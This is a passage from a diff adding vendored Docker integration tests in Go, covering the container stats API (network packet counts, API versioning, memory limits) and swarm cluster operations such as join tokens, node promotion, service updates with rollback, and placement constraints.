+	id := strings.TrimSpace(out)
+
+	getGoRoutines := func() int {
+		_, body, err := sockRequestRaw("GET", fmt.Sprintf("/info"), nil, "")
+		c.Assert(err, checker.IsNil)
+		info := types.Info{}
+		err = json.NewDecoder(body).Decode(&info)
+		c.Assert(err, checker.IsNil)
+		body.Close()
+		return info.NGoroutines
+	}
+
+	// When the HTTP connection is closed, the number of goroutines should not increase.
+	routines := getGoRoutines()
+	_, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats", id), nil, "")
+	c.Assert(err, checker.IsNil)
+	body.Close()
+
+	t := time.After(30 * time.Second)
+	for {
+		select {
+		case <-t:
+			c.Assert(getGoRoutines(), checker.LessOrEqualThan, routines)
+			return
+		default:
+			if n := getGoRoutines(); n <= routines {
+				return
+			}
+			time.Sleep(200 * time.Millisecond)
+		}
+	}
+}
+
+func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	out, _ := runSleepingContainer(c)
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	// Retrieve the container address
+	net := "bridge"
+	if daemonPlatform == "windows" {
+		net = "nat"
+	}
+	contIP := findContainerIP(c, id, net)
+	numPings := 1
+
+	var preRxPackets uint64
+	var preTxPackets uint64
+	var postRxPackets uint64
+	var postTxPackets uint64
+
+	// Get the container networking stats before and after pinging the container
+	nwStatsPre := getNetworkStats(c, id)
+	for _, v := range nwStatsPre {
+		preRxPackets += v.RxPackets
+		preTxPackets += v.TxPackets
+	}
+
+	countParam := "-c"
+	if runtime.GOOS == "windows" {
+		countParam = "-n" // Ping count parameter is -n on Windows
+	}
+	pingout, err := exec.Command("ping", contIP, countParam, strconv.Itoa(numPings)).CombinedOutput()
+	if err != nil && runtime.GOOS == "linux" {
+		// If it fails then try a work-around, but just for linux.
+		// If this fails too then go back to the old error for reporting.
+		//
+		// The ping will sometimes fail due to an apparmor issue where it
+		// denies access to the libc.so.6 shared library - running it
+		// via /lib64/ld-linux-x86-64.so.2 seems to work around it.
+		pingout2, err2 := exec.Command("/lib64/ld-linux-x86-64.so.2", "/bin/ping", contIP, "-c", strconv.Itoa(numPings)).CombinedOutput()
+		if err2 == nil {
+			pingout = pingout2
+			err = err2
+		}
+	}
+	c.Assert(err, checker.IsNil)
+	pingouts := string(pingout[:])
+	nwStatsPost := getNetworkStats(c, id)
+	for _, v := range nwStatsPost {
+		postRxPackets += v.RxPackets
+		postTxPackets += v.TxPackets
+	}
+
+	// Verify the stats contain at least the expected number of packets
+	// On Linux, account for ARP.
+	expRxPkts := preRxPackets + uint64(numPings)
+	expTxPkts := preTxPackets + uint64(numPings)
+	if daemonPlatform != "windows" {
+		expRxPkts++
+		expTxPkts++
+	}
+	c.Assert(postTxPackets, checker.GreaterOrEqualThan, expTxPkts,
+		check.Commentf("Reported less TxPackets than expected. Expected >= %d. Found %d. %s", expTxPkts, postTxPackets, pingouts))
+	c.Assert(postRxPackets, checker.GreaterOrEqualThan, expRxPkts,
+		check.Commentf("Reported less Txbytes than expected. Expected >= %d. Found %d. %s", expRxPkts, postRxPackets, pingouts))
+}
+
+func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) {
+	// Windows doesn't support API versions less than 1.25, so no point testing 1.17 .. 1.21
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	out, _ := runSleepingContainer(c)
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+	wg := sync.WaitGroup{}
+
+	for i := 17; i <= 21; i++ {
+		wg.Add(1)
+		go func(i int) {
+			defer wg.Done()
+			apiVersion := fmt.Sprintf("v1.%d", i)
+			statsJSONBlob := getVersionedStats(c, id, apiVersion)
+			if versions.LessThan(apiVersion, "v1.21") {
+				c.Assert(jsonBlobHasLTv121NetworkStats(statsJSONBlob), checker.Equals, true,
+					check.Commentf("Stats JSON blob from API %s %#v does not look like a <v1.21 API stats structure", apiVersion, statsJSONBlob))
+			} else {
+				c.Assert(jsonBlobHasGTE121NetworkStats(statsJSONBlob), checker.Equals, true,
+					check.Commentf("Stats JSON blob from API %s %#v does not look like a >=v1.21 API stats structure", apiVersion, statsJSONBlob))
+			}
+		}(i)
+	}
+	wg.Wait()
+}
+
+func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats {
+	var st *types.StatsJSON
+
+	_, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "")
+	c.Assert(err, checker.IsNil)
+
+	err = json.NewDecoder(body).Decode(&st)
+	c.Assert(err, checker.IsNil)
+	body.Close()
+
+	return st.Networks
+}
+
+// getVersionedStats returns stats result for the
+// container with id using an API call with version apiVersion. Since the
+// stats result type differs between API versions, we simply return
+// map[string]interface{}.
+func getVersionedStats(c *check.C, id string, apiVersion string) map[string]interface{} {
+	stats := make(map[string]interface{})
+
+	_, body, err := sockRequestRaw("GET", fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id), nil, "")
+	c.Assert(err, checker.IsNil)
+	defer body.Close()
+
+	err = json.NewDecoder(body).Decode(&stats)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to decode stat: %s", err))
+
+	return stats
+}
+
+func jsonBlobHasLTv121NetworkStats(blob map[string]interface{}) bool {
+	networkStatsIntfc, ok := blob["network"]
+	if !ok {
+		return false
+	}
+	networkStats, ok := networkStatsIntfc.(map[string]interface{})
+	if !ok {
+		return false
+	}
+	for _, expectedKey := range expectedNetworkInterfaceStats {
+		if _, ok := networkStats[expectedKey]; !ok {
+			return false
+		}
+	}
+	return true
+}
+
+func jsonBlobHasGTE121NetworkStats(blob map[string]interface{}) bool {
+	networksStatsIntfc, ok := blob["networks"]
+	if !ok {
+		return false
+	}
+	networksStats, ok := networksStatsIntfc.(map[string]interface{})
+	if !ok {
+		return false
+	}
+	for _, networkInterfaceStatsIntfc := range networksStats {
+		networkInterfaceStats, ok := networkInterfaceStatsIntfc.(map[string]interface{})
+		if !ok {
+			return false
+		}
+		for _, expectedKey := range expectedNetworkInterfaceStats {
+			if _, ok := networkInterfaceStats[expectedKey]; !ok {
+				return false
+			}
+		}
+	}
+	return true
+}
+
+func (s *DockerSuite) TestAPIStatsContainerNotFound(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	status, _, err := sockRequest("GET", "/containers/nonexistent/stats", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNotFound)
+
+	status, _, err = sockRequest("GET", "/containers/nonexistent/stats?stream=0", nil)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusNotFound)
+}
+
+func (s *DockerSuite) TestAPIStatsNoStreamConnectedContainers(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	out1, _ := runSleepingContainer(c)
+	id1 := strings.TrimSpace(out1)
+	c.Assert(waitRun(id1), checker.IsNil)
+
+	out2, _ := runSleepingContainer(c, "--net", "container:"+id1)
+	id2 := strings.TrimSpace(out2)
+	c.Assert(waitRun(id2), checker.IsNil)
+
+	ch := make(chan error)
+	go func() {
+		resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id2), nil, "")
+		defer body.Close()
+		if err != nil {
+			ch <- err
+		}
+		if resp.StatusCode != http.StatusOK {
+			ch <- fmt.Errorf("Invalid StatusCode %v", resp.StatusCode)
+		}
+		if resp.Header.Get("Content-Type") != "application/json" {
+			ch <- fmt.Errorf("Invalid 'Content-Type' %v", resp.Header.Get("Content-Type"))
+		}
+		var v *types.Stats
+		if err := json.NewDecoder(body).Decode(&v); err != nil {
+			ch <- err
+		}
+		ch <- nil
+	}()
+
+	select {
+	case err := <-ch:
+		c.Assert(err, checker.IsNil, check.Commentf("Error in stats Engine API: %v", err))
+	case <-time.After(15 * time.Second):
+		c.Fatalf("Stats did not return after timeout")
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go
new file mode 100644
index 0000000000..0995ce3833
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go
@@ -0,0 +1,41 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestAPIStatsContainerGetMemoryLimit(c *check.C) {
+	testRequires(c, DaemonIsLinux, memoryLimitSupport)
+
+	resp, body, err := sockRequestRaw("GET", "/info", nil, "application/json")
+	c.Assert(err, checker.IsNil)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
+	var info types.Info
+	err = json.NewDecoder(body).Decode(&info)
+	c.Assert(err, checker.IsNil)
+	body.Close()
+
+	// don't set a memory limit, the memory limit should be system memory
+	conName := "foo"
+	dockerCmd(c, "run", "-d", "--name", conName, "busybox", "top")
+	c.Assert(waitRun(conName), checker.IsNil)
+
+	resp, body, err = sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", conName), nil, "")
+	c.Assert(err, checker.IsNil)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
+	c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json")
+
+	var v *types.Stats
+	err = json.NewDecoder(body).Decode(&v)
+	c.Assert(err, checker.IsNil)
+	body.Close()
+	c.Assert(fmt.Sprintf("%d", v.MemoryStats.Limit), checker.Equals, fmt.Sprintf("%d", info.MemTotal))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go
new file mode 100644
index 0000000000..1f8eaec6de
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go
@@ -0,0 +1,1367 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+var defaultReconciliationTimeout = 30 * time.Second
+
+func (s *DockerSwarmSuite) TestAPISwarmInit(c *check.C) {
+	// todo: should find a better way to verify that components are running than /info
+	d1 := s.AddDaemon(c, true, true)
+	info, err := d1.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.ControlAvailable, checker.True)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	d2 := s.AddDaemon(c, true, false)
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.ControlAvailable, checker.False)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	// Leaving cluster
+	c.Assert(d2.Leave(false), checker.IsNil)
+
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.ControlAvailable, checker.False)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+
+	c.Assert(d2.Join(swarm.JoinRequest{JoinToken: d1.joinTokens(c).Worker, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil)
+
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.ControlAvailable, checker.False)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	// Current state restoring after restarts
+	err = d1.Stop()
+	c.Assert(err, checker.IsNil)
+	err = d2.Stop()
+	c.Assert(err, checker.IsNil)
+
+	err = d1.Start()
+	c.Assert(err, checker.IsNil)
+	err = d2.Start()
+	c.Assert(err, checker.IsNil)
+
+	info, err = d1.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.ControlAvailable, checker.True)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.ControlAvailable, checker.False)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmJoinToken(c *check.C) {
+	d1 := s.AddDaemon(c, false, false)
+	c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil)
+
+	d2 := s.AddDaemon(c, false, false)
+	err := d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}})
+	c.Assert(err, checker.NotNil)
+	c.Assert(err.Error(), checker.Contains, "join token is necessary")
+	info, err := d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+
+	err = d2.Join(swarm.JoinRequest{JoinToken: "foobaz", RemoteAddrs: []string{d1.listenAddr}})
+	c.Assert(err, checker.NotNil)
+	c.Assert(err.Error(), checker.Contains, "join token is necessary")
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+
+	workerToken := d1.joinTokens(c).Worker
+
+	c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil)
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	c.Assert(d2.Leave(false), checker.IsNil)
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+
+	// change tokens
+	d1.rotateTokens(c)
+
+	err = d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}})
+	c.Assert(err, checker.NotNil)
+	c.Assert(err.Error(), checker.Contains, "join token is necessary")
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+
+	workerToken = d1.joinTokens(c).Worker
+
+	c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil)
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	c.Assert(d2.Leave(false), checker.IsNil)
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+
+	// change spec, don't change tokens
+	d1.updateSwarm(c, func(s *swarm.Spec) {})
+
+	err = d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}})
+	c.Assert(err, checker.NotNil)
+	c.Assert(err.Error(), checker.Contains, "join token is necessary")
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+
+	c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil)
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	c.Assert(d2.Leave(false), checker.IsNil)
+	info, err = d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmCAHash(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, false, false)
+	splitToken := strings.Split(d1.joinTokens(c).Worker, "-")
+	splitToken[2] = "1kxftv4ofnc6mt30lmgipg6ngf9luhwqopfk1tz6bdmnkubg0e"
+	replacementToken := strings.Join(splitToken, "-")
+	err := d2.Join(swarm.JoinRequest{JoinToken: replacementToken, RemoteAddrs: []string{d1.listenAddr}})
+	c.Assert(err, checker.NotNil)
+	c.Assert(err.Error(), checker.Contains, "remote CA does not match fingerprint")
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmPromoteDemote(c *check.C) {
+	d1 := s.AddDaemon(c, false, false)
+	c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil)
+	d2 := s.AddDaemon(c, true, false)
+
+	info, err := d2.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.ControlAvailable, checker.False)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+
+	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+		n.Spec.Role = swarm.NodeRoleManager
+	})
+
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True)
+
+	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+		n.Spec.Role = swarm.NodeRoleWorker
+	})
+
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.False)
+
+	// Demoting last node should fail
+	node := d1.getNode(c, d1.NodeID)
+	node.Spec.Role = swarm.NodeRoleWorker
+	url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index)
+	status, out, err := d1.SockRequest("POST", url, node.Spec)
+	c.Assert(err, checker.IsNil)
+	c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("output: %q", string(out)))
+	c.Assert(string(out), checker.Contains, "last manager of the swarm")
+	info, err = d1.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	c.Assert(info.ControlAvailable, checker.True)
+
+	// Promote already demoted node
+	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+		n.Spec.Role = swarm.NodeRoleManager
+	})
+
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	services := d.listServices(c)
+	c.Assert(services, checker.NotNil)
+	c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services))
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	instances := 2
+	id := d.createService(c, simpleTestService, setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
+
+	service := d.getService(c, id)
+	instances = 5
+	d.updateService(c, service, setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
+
+	d.removeService(c, service.ID)
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	d3 := s.AddDaemon(c, true, false)
+
+	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks
+
+	instances := 9
+	id := d1.createService(c, simpleTestService, setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.GreaterThan, 0)
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
+
+	// reconciliation on d2 node down
+	c.Assert(d2.Stop(), checker.IsNil)
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
+
+	// test downscaling
+	instances = 5
+	d1.updateService(c, d1.getService(c, id), setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
+
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	d3 := s.AddDaemon(c, true, false)
+
+	d1.createService(c, simpleTestService, setGlobalMode)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.Equals, 1)
+
+	d4 := s.AddDaemon(c, true, false)
+	d5 := s.AddDaemon(c, true, false)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d4.checkActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d5.checkActiveContainerCount, checker.Equals, 1)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*SwarmDaemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount)
+
+	// service image at start
+	image1 := "busybox:latest"
+	// target image in update
+	image2 := "busybox:test"
+
+	// create a different tag
+	for _, d := range daemons {
+		out, err := d.Cmd("tag", image1, image2)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+	}
+
+	// create service
+	instances := 5
+	parallelism := 2
+	id := daemons[0].createService(c, serviceForUpdate, setInstances(instances))
+
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+
+	// issue service update
+	service := daemons[0].getService(c, id)
+	daemons[0].updateService(c, service, setImage(image2))
+
+	// first batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances - parallelism, image2: parallelism})
+
+	// 2nd batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism})
+
+	// 3nd batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image2: instances})
+
+	// Roll back to the previous version. This uses the CLI because
+	// rollback is a client-side operation.
+	out, err := daemons[0].Cmd("service", "update", "--rollback", id)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// first batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image2: instances - parallelism, image1: parallelism})
+
+	// 2nd batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image2: instances - 2*parallelism, image1: 2 * parallelism})
+
+	// 3nd batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*SwarmDaemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount)
+
+	// service image at start
+	image1 := "busybox:latest"
+	// target image in update
+	image2 := "busybox:badtag"
+
+	// create service
+	instances := 5
+	id := daemons[0].createService(c, serviceForUpdate, setInstances(instances))
+
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+
+	// issue service update
+	service := daemons[0].getService(c, id)
+	daemons[0].updateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1))
+
+	// should update 2 tasks and then pause
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused)
+	v, _ := daemons[0].checkServiceRunningTasks(id)(c)
+	c.Assert(v, checker.Equals, instances-2)
+
+	// Roll back to the previous version. This uses the CLI because
+	// rollback is a client-side operation.
+	out, err := daemons[0].Cmd("service", "update", "--rollback", id)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*SwarmDaemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount)
+
+	// create service
+	constraints := []string{"node.role==worker"}
+	instances := 3
+	id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
+	// validate tasks are running on worker nodes
+	tasks := daemons[0].getServiceTasks(c, id)
+	for _, task := range tasks {
+		node := daemons[0].getNode(c, task.NodeID)
+		c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker)
+	}
+	//remove service
+	daemons[0].removeService(c, id)
+
+	// create service
+	constraints = []string{"node.role!=worker"}
+	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
+	tasks = daemons[0].getServiceTasks(c, id)
+	// validate tasks are running on manager nodes
+	for _, task := range tasks {
+		node := daemons[0].getNode(c, task.NodeID)
+		c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager)
+	}
+	//remove service
+	daemons[0].removeService(c, id)
+
+	// create service
+	constraints = []string{"node.role==nosuchrole"}
+	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks created
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances)
+	// let scheduler try
+	time.Sleep(250 * time.Millisecond)
+	// validate tasks are not assigned to any node
+	tasks = daemons[0].getServiceTasks(c, id)
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, "")
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*SwarmDaemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount)
+	nodes := daemons[0].listNodes(c)
+	c.Assert(len(nodes), checker.Equals, nodeCount)
+
+	// add labels to nodes
+	daemons[0].updateNode(c, nodes[0].ID, func(n *swarm.Node) {
+		n.Spec.Annotations.Labels = map[string]string{
+			"security": "high",
+		}
+	})
+	for i := 1; i < nodeCount; i++ {
+		daemons[0].updateNode(c, nodes[i].ID, func(n *swarm.Node) {
+			n.Spec.Annotations.Labels = map[string]string{
+				"security": "low",
+			}
+		})
+	}
+
+	// create service
+	instances := 3
+	constraints := []string{"node.labels.security==high"}
+	id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
+	tasks := daemons[0].getServiceTasks(c, id)
+	// validate all tasks are running on nodes[0]
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, nodes[0].ID)
+	}
+	//remove service
+	daemons[0].removeService(c, id)
+
+	// create service
+	constraints = []string{"node.labels.security!=high"}
+	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
+	tasks = daemons[0].getServiceTasks(c, id)
+	// validate all tasks are NOT running on nodes[0]
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID)
+	}
+	//remove service
+	daemons[0].removeService(c, id)
+
+	constraints = []string{"node.labels.security==medium"}
+	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks created
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances)
+	// let scheduler try
+	time.Sleep(250 * time.Millisecond)
+	tasks = daemons[0].getServiceTasks(c, id)
+	// validate tasks are not assigned
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, "")
+	}
+	//remove service
+	daemons[0].removeService(c, id)
+
+	// multiple constraints
+	constraints = []string{
+		"node.labels.security==high",
+		fmt.Sprintf("node.id==%s", nodes[1].ID),
+	}
+	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks created
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances)
+	// let scheduler try
